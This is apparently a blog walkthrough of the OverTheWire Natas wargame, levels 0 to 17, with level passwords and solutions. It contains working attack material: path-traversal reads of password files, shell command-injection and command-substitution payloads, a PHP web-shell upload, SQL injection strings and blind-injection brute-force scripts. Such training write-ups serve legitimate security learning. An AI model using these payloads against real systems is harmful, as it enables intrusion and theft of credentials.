OverTheWire-Natas
2022-07-25 09:17:00 【目标是技术宅】
https://overthewire.org/wargames/natas/
Covers the first 17 Natas levels; more to be added.
1.natas0
F12 (view the page source in the browser developer tools)
gtVrDuiDfck831PqWsLEZy5gyDz1clto
2.natas1
F12 (view the page source in the browser developer tools)
ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi
3.natas2
Guessing a sibling path
Press F12 and you notice an image is loaded from /files/pixel.png, so browse to /files: besides pixel.png there is also a users.txt. Open users.txt to get the password for the next level.
sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
4.natas3
robots.txt
"No more information leaks!! Not even Google will find it this time…" This sentence is a hint at robots.txt. robots.txt is the standard a website uses to communicate with web crawlers (such as Google) and other web robots; it tells robots which areas of the site they should not process or scan.
Open robots.txt and you see Disallow: /s3cr3t/. Browse to that path, find user.txt, and read the password from it.
Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
5.natas4
Intercept the request and modify the Referer header
so that the site believes the visit came from http://natas5.natas.labs.overthewire.org/
iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
6.natas5
Intercept the request and change the loggedin field to 1
aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
7.natas6
```php
<?
include "includes/secret.inc";

if(array_key_exists("submit", $_POST)) {
    if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
}
?>
```
Browse to /includes/secret.inc, which reveals $secret = "FOEIUWGHFEEUHOFUOIU"; submit that secret to get the password.
7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
8.natas7
There is a hint in the page source:
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
?page=/etc/natas_webpass/natas8
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
9.natas8
```php
<?
$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
        print "Access granted. The password for natas9 is <censored>";
    } else {
        print "Wrong secret";
    }
}
?>
```
Just undo the encoding steps in reverse order (hex2bin, strrev, base64_decode); a short piece of PHP does it:
```php
<?php
$secret = "3d3d516343746d4d6d6c315669563362";
echo base64_decode(strrev(hex2bin($secret)));
?>
```
This yields oubWYf2kBq; submit it to get the password.
W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
10.natas9
Command injection
```php
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
```
The submitted key is searched for in dictionary.txt. passthru executes a shell command, much like exec, and the key is spliced into the command line unescaped, so command injection applies:
; cat /etc/natas_webpass/natas10
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
11.natas10
grep several files in one call
```php
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>
```
The characters ; | & are now rejected, so no additional command can be appended; the only thing left to work with is grep itself. Set the pattern to '' (the empty string), which matches every line, and add a second file name: grep then prints the full contents of both files:
'' /etc/natas_webpass/natas11
U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
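Added example (mine, not from the original post): a small Python model of how the natas10 blocklist and the grep command line interact. The `[;|&]` filter accepts `'' /etc/natas_webpass/natas11`, and because the needle is spliced into a shell string, the shell splits it into extra arguments; building argv as a list (the equivalent of wrapping $key in escapeshellarg in PHP) keeps the whole needle as one pattern. Function names are my own.

```python
import re
import shlex

# Same blocklist as the natas10 source: only ; | & are rejected.
ILLEGAL = re.compile(r'[;|&]')

def passes_filter(needle):
    """True when natas10's preg_match check would let the input through."""
    return not ILLEGAL.search(needle)

def shell_argv(needle):
    """argv the shell builds for passthru("grep -i $needle dictionary.txt"):
    the needle is word-split, so spaces inside it become separate arguments."""
    return shlex.split("grep -i " + needle + " dictionary.txt")

def safe_argv(needle):
    """Hardened form: one argv element per argument and no shell in between,
    plus `--` so a needle starting with '-' cannot be read as a grep option."""
    return ["grep", "-i", "--", needle, "dictionary.txt"]

def extra_files(argv):
    """File operands grep would read in addition to dictionary.txt."""
    pattern_index = argv.index("--") + 1 if "--" in argv else 2
    return argv[pattern_index + 1:-1]
```

Running `extra_files(shell_argv("'' /etc/natas_webpass/natas11"))` shows the second file operand the walkthrough relies on, while the list form yields none.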
12.natas11
Forging the cookie
```php
<?
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
        $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
        $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
        if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
            if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
                $mydata['showpassword'] = $tempdata['showpassword'];
                $mydata['bgcolor'] = $tempdata['bgcolor'];
            }
        }
    }
    return $mydata;
}

function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}

saveData($data);
?>
<?
if($data["showpassword"] == "yes") {
    print "The password for natas12 is <censored><br>";
}
?>
```
The data value in the cookie is ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxEJaAw%3D; the %3D is URL encoding and must be replaced by =, giving ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxEJaAw=
Step 1: recover the $key used by xor_encrypt. JSON-encode the contents of $defaultdata and XOR it with the base64-decoded cookie value; since XOR is its own inverse, this yields the repeating key, which comes out as qw8J.
Step 2: compute the forged cookie with the same key:
```php
$test1 = base64_encode(xor_encrypt(json_encode(array( "showpassword"=>"yes", "bgcolor"=>"#ffffff"))));
```
which gives ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
Step 3: replace the cookie in the browser and refresh the page to get the password.
EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
13.natas12
Changing the file extension
```php
if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);

    if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
}
```
The key observation is that the link to the uploaded file can be opened, i.e. uploads are served from a web-accessible directory. Upload a jpg file, intercept the request and change the extension in the filename field to php so the upload is stored as a .php file, then follow the link to execute it. The uploaded file contains:
```php
<?php system("cat /etc/natas_pass/natas13"); ?>
```
jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
14.natas13
exif_imagetype
```php
else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
    echo "File is not an image";
}
```
exif_imagetype reads the first bytes of the file and checks them against known image signatures. File signatures can be looked up at https://filesignatures.net/
So prepend the JPEG signature bytes FF D8 FF E0 to the PHP file before uploading to pass the check, then intercept the request and change the extension to php as before.
Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1
15.natas14
```php
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
```
Build the SQL injection: the username can be anything, and the password is 1" or "1" = "1
AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J
16.natas15
Blind SQL injection
```php
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
if(array_key_exists("debug", $_GET)) {
    echo "Executing query: $query<br>";
}

$res = mysql_query($query, $link);
if($res) {
    if(mysql_num_rows($res) > 0) {
        echo "This user exists.<br>";
    } else {
        echo "This user doesn't exist.<br>";
    }
} else {
    echo "Error in query.<br>";
}

mysql_close($link);
} else {
?>
```
The source also provides the table definition:
```sql
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
```
Guess that the username is natas16, then brute-force the password: the page only tells us whether a row matched, so a correct password guess is the one for which mysql_num_rows($res) > 0 holds. Brute-force the 123 part below:
```
natas16" and password = "123
```
Below is the brute-force Python code used for reference. Because the PHP code reads parameters from $_REQUEST, the data can be submitted via GET.
The first half of the script determines which characters occur in the password, which narrows the search space:
```python
import requests, string

url = "http://natas15.natas.labs.overthewire.org"
auth_username = "natas15"
auth_password = "AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J"
# characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
characters = ''.join([string.ascii_letters, string.digits])

# Begin by building a dictionary of characters found in the password
# This will greatly decrease the complexity for our brute force attempts
password_dictionary = []
exists_str = "This user exists."
for char in characters:
    # password LIKE BINARY "%c%" is true when the character occurs anywhere in the password
    uri = ''.join([url, '?', 'username=natas16"', '+and+password+LIKE+BINARY+"%', char, '%', '&debug'])
    r = requests.get(uri, auth=(auth_username, auth_password))
    if exists_str in r.text:
        password_dictionary.append(char)
        print("Password Dictionary: {0}".format(''.join(password_dictionary)))
print("Dictionary build complete.")
print("Dictionary: {0}".format(''.join(password_dictionary)))
```
The second half confirms the password one character at a time, extending the known prefix whenever a LIKE BINARY "prefix%" test succeeds:
```python
print("Now attempting to brute force...")
password_list = []
password = ''
for i in range(1, 64):
    for char in password_dictionary:
        test = ''.join([password, char])
        # Build the GET Request
        uri = ''.join([url, '?', 'username=natas16"', '+and+password+LIKE+BINARY+"', test, '%', '&debug'])
        # Send the HTTP GET request to the server
        r = requests.get(uri, auth=(auth_username, auth_password))
        # Parse the HTTP response
        if exists_str in r.text:
            password_list.append(char)
            password = ''.join(password_list)
            print("Length: {0}, Password: {1}".format(len(password), password))
```
WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
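Added example (mine, not from the original post): the boolean-based extraction that the two scripts above perform, run offline against an in-memory SQLite table with a constructed password so the logic can be checked without the wargame, and then run against a parameterised version of the same query, where the injected condition is never interpreted and nothing is recovered. Single quotes replace the source's double quotes because SQLite reads double-quoted strings as identifiers, and PRAGMA case_sensitive_like stands in for MySQL's LIKE BINARY; the table contents are constructed.

```python
import sqlite3
import string

# Constructed sample rows; the natas16 password here is made up for the demo.
SAMPLE_USERS = [("natas16", "Zx9kQa3p"), ("alice", "hunter2")]

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("PRAGMA case_sensitive_like = ON")  # SQLite stand-in for LIKE BINARY
    con.execute("CREATE TABLE users (username varchar(64), password varchar(64))")
    con.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return con

def user_exists_vulnerable(con, username):
    """natas15 logic: the username is concatenated into the query and the only
    signal returned is whether the row count is greater than zero."""
    query = "SELECT * FROM users WHERE username='" + username + "'"
    return len(con.execute(query).fetchall()) > 0

def user_exists_fixed(con, username):
    """Parameterised form: the input is bound as a value, so any quotes or
    AND clauses inside it are compared literally against the username column."""
    query = "SELECT * FROM users WHERE username=?"
    return len(con.execute(query, (username,)).fetchall()) > 0

def extract_password(oracle, target):
    """Same two phases as the walkthrough's script: learn which characters occur,
    then extend a known prefix one character at a time. oracle(username) -> bool."""
    alphabet = string.ascii_letters + string.digits
    present = [c for c in alphabet
               if oracle(target + "' AND password LIKE '%" + c + "%")]
    password = ""
    while True:
        for c in present:
            if oracle(target + "' AND password LIKE '" + password + c + "%"):
                password += c
                break
        else:
            return password  # no character extends the prefix: extraction is complete
```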
17.natas16
Command substitution
```php
if($key != "") {
    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");
    }
}
```
Command substitution lets the output of a command replace the command itself. It happens when a command is enclosed in one of these forms:
```
$(command)
`command`
```
The backtick is filtered but $( ) is not, so write a script that leaks the result through command substitution. An empty pattern cannot be submitted, so characters have to be tried one at a time.
If /etc/natas_webpass/natas17 does not contain an a, the inner command produces no output, the outer command becomes grep whitest, and whitest appears in the output; if it does contain an a, the pattern becomes whitestXXX, which is not in the dictionary, and the output is empty.
So whenever whitest is absent from the output, /etc/natas_webpass/natas17 contains that character.
```
whitest$(grep ^a /etc/natas_webpass/natas17)
```
The script first tests which characters occur in the file, then determines the leading characters one at a time. ^ anchors the pattern to the start of the line.
```python
import requests, string

url = "http://natas16.natas.labs.overthewire.org"
auth_username = "natas16"
auth_password = "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh"
characters = ''.join([string.ascii_letters, string.digits])

# Phase 1: which characters occur anywhere in the password file
password_dictionary = []
for char in characters:
    uri = ''.join([url, '?', 'needle=whitest$(grep ', char, ' /etc/natas_webpass/natas17)'])
    r = requests.get(uri, auth=(auth_username, auth_password))
    # "whitest" missing from the output means the inner grep matched, i.e. the character is present
    if "whitest" not in r.text:
        password_dictionary.append(char)
        print(''.join(password_dictionary))
print("Dictionary build complete.")

# Phase 2: extend the known prefix one character at a time using an anchored pattern
print("Now attempting to brute force...")
password_list = []
password = ''
for i in range(1, 64):
    for char in password_dictionary:
        test = ''.join([password, char])
        # Build the GET Request
        uri = ''.join([url, '?', 'needle=whitest$(grep ^', test, ' /etc/natas_webpass/natas17)'])
        # Send the HTTP GET request to the server
        r = requests.get(uri, auth=(auth_username, auth_password))
        # Parse the HTTP response
        if "whitest" not in r.text:
            password_list.append(char)
            password = ''.join(password_list)
            print("Length: {0}, Password: {1}".format(len(password), password))
```
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
18.natas17
```php
/* CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) DEFAULT NULL ); */

$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
if(array_key_exists("debug", $_GET)) {
    echo "Executing query: $query<br>";
}

$res = mysql_query($query, $link);
if($res) {
    if(mysql_num_rows($res) > 0) {
        //echo "This user exists.<br>";
    } else {
        //echo "This user doesn't exist.<br>";
    }
} else {
    //echo "Error in query.<br>";
}

mysql_close($link);
```
The page output is now identical whether or not the user exists, so the boolean oracle from natas15 is gone. Testing the input below in the form produces a clearly delayed response, so the sleep function can serve as the oracle instead: the delay only occurs when the preceding condition holds.
```
natas18" and sleep(5)#
```